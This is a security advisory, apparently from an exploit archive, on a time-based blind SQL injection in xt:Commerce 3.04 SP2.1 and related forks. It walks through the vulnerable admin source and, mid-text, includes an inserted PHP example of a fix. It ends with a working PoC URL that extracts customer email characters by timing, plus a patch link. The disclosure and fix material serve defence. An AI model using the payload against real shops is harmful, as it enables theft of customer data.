xt:Commerce 3.04 SP2.1 Blind SQL Injection
Posted Aug 16, 2012
Authored by Ralf Zimmermann

xt:Commerce versions 3.04 SP2.1 and below suffer from a time based blind SQL injection vulnerability.

tags | exploit, sql injection
MD5 | 465c373bb70f652c9883216edb1b06a2

+--------------------------------+
| xt:Commerce <= v3.04 SP2.1     |
| commerce:SEO <= v2.1 CE        |
| Gambio <= v2.0.10 SP1.4        |
| Time Based Blind SQL Injection |
+--------------------------------+

Author.............: Ralf Zimmermann
Mail...............: info[AT]stoffline.com
Vendor Homepage....: http://www.xt-commerce.com/
Software Link......: http://www.xtc-load.de/2008/07/xtcommerce-v304-sp21/
Affected Version...: xt:Commerce <= v3.04 SP2.1, commerce:SEO <= v2.1 CE, Gambio <= v2.0.10 SP1.4
URL................: http://stoffline.com/golb/details-zur-sicherheitslucke-in-xtcommerce/ (german)
URL................: http://stoffline.com/golb/sicherheitslucke-in-xtcommerce/ (german)
Date...............: 12/06/2012

-----------------------------------------------------------
Author will not be responsible for any damage.
-----------------------------------------------------------
I. DESCRIPTION
-----------------------------------------------------------

# we need to be logged in as a regular customer...

admin/backup.php
18: require('includes/application_top.php');

admin/includes/application_top.php
399: $current_page = split('\?', basename($_SERVER['PHP_SELF'])); $current_page = $current_page[0]; // for BadBlue(Win32) webserver compatibility
# if you go to
# http://127.0.0.1/xtc_304SP21/admin/backup.php/test.php?
# $current_page becomes 'test.php' instead of 'backup.php', because Apache's AcceptPathInfo passes the entire path in PHP_SELF

486: $pagename = strtok($current_page, '.');
# $pagename = 'test';

487: if (!isset($_SESSION['customer_id'])) {
488: xtc_redirect(xtc_href_link(FILENAME_LOGIN));
489: }
# We need to be logged in, but we pass this checkpoint regardless of our customer status

491: if (xtc_check_permission($pagename) == '0') {
492: xtc_redirect(xtc_href_link(FILENAME_LOGIN));
493: }

admin/includes/functions/general.php
110: function xtc_check_permission($pagename) {
111: if ($pagename != 'index') {
112: $access_permission_query = xtc_db_query("select ".$pagename." from ".TABLE_ADMIN_ACCESS." where customers_id = '".$_SESSION['customer_id']."'");
113: $access_permission = xtc_db_fetch_array($access_permission_query);
114:
115: if (($_SESSION['customers_status']['customers_status_id'] == '0')&& ($access_permission[$pagename] == '1')) {
116: return true;
117: } else {
118: return false;
119: }
120: } else {
121: xtc_redirect(xtc_href_link(FILENAME_LOGIN));
122: }
123: }
# $pagename goes into the query without any validation:
# select test from admin_access where customers_id = 2

# Every valid SQL query ends with a redirect to the login page, so no result is returned to us directly.
# We can use time-based MySQL functions such as BENCHMARK() to exploit the vulnerability.
# The PoC checks whether the first character of the customer's email address is 'a'.
# If so, the query takes a noticeable amount of time, e.g. 10 seconds; if not, we are redirected to the login page immediately.
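As an added example (not part of the advisory and not xt:Commerce's own code), the following PHP shows the two corrections that close the chain described above: derive the page name from SCRIPT_NAME instead of PHP_SELF, and refuse any name that is not a known admin_access column before it can reach SQL. The column whitelist, the request array and the function names are constructed for this example.

```php
<?php
// Added example, not xt:Commerce's own code. It shows the two fixes a
// defender would make to the chain described above: derive $pagename from
// SCRIPT_NAME rather than PHP_SELF, and refuse any name that is not a known
// admin_access column before it gets near SQL. The page list is constructed.

// Columns that actually exist in admin_access (constructed sample whitelist).
const ADMIN_ACCESS_PAGES = ['backup', 'customers', 'orders', 'products'];

// SCRIPT_NAME names only the script that ran (admin/backup.php); PHP_SELF
// also carries the trailing PATH_INFO when Apache's AcceptPathInfo is on.
function xtc_current_pagename(array $server): string
{
    $script = basename($server['SCRIPT_NAME'] ?? '');
    $pagename = strtok($script, '.');
    return $pagename === false ? '' : $pagename;
}

// Returns the permission query for a whitelisted page, or null when the
// name is unknown or the session id is not numeric. No caller-controlled
// text reaches the SQL string: the identifier is whitelisted, the id is cast.
function xtc_permission_query(string $pagename, $customerId): ?string
{
    if (!in_array($pagename, ADMIN_ACCESS_PAGES, true)) {
        return null;
    }
    if (!ctype_digit((string) $customerId)) {
        return null;
    }
    return sprintf(
        "SELECT `%s` FROM admin_access WHERE customers_id = %d",
        $pagename, (int) $customerId
    );
}

// Constructed request mirroring the one in the description:
// /admin/backup.php/test.php? with AcceptPathInfo enabled.
$server = [
    'PHP_SELF'    => '/xtc_304SP21/admin/backup.php/test.php',
    'SCRIPT_NAME' => '/xtc_304SP21/admin/backup.php',
];
$fromPhpSelf = strtok(basename($server['PHP_SELF']), '.'); // the original derivation: 'test'
$fromScript  = xtc_current_pagename($server);               // the fixed derivation: 'backup'

var_dump(xtc_permission_query($fromPhpSelf, 2));            // rejected: 'test' is not a known column
var_dump(xtc_permission_query($fromScript, 2));             // built: query for the `backup` column
var_dump(xtc_permission_query($fromScript, 'not-a-number')); // rejected: non-numeric session id
```

Run with `php example.php`; the whitelist check is what matters, since quoting an identifier alone would not stop a column name chosen by the client.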

-----------------------------------------------------------

II. PoC EXPLOIT
-----------------------------------------------------------
http://127.0.0.1/xtc_304SP21/admin/backup.php/IF((SELECT%20ASCII(SUBSTR(customers_email_address,1,1))%20FROM%20customers%20WHERE%20customers_id=1)=97,BENCHMARK(100000000,MD5(1)),1)--%20.php?
-----------------------------------------------------------

III. SOLUTION
-----------------------------------------------------------
Patches can be found here:
http://www.xtc-load.de/2012/06/wichtiges-security-update-fur-alle-xtc-forks/
-----------------------------------------------------------
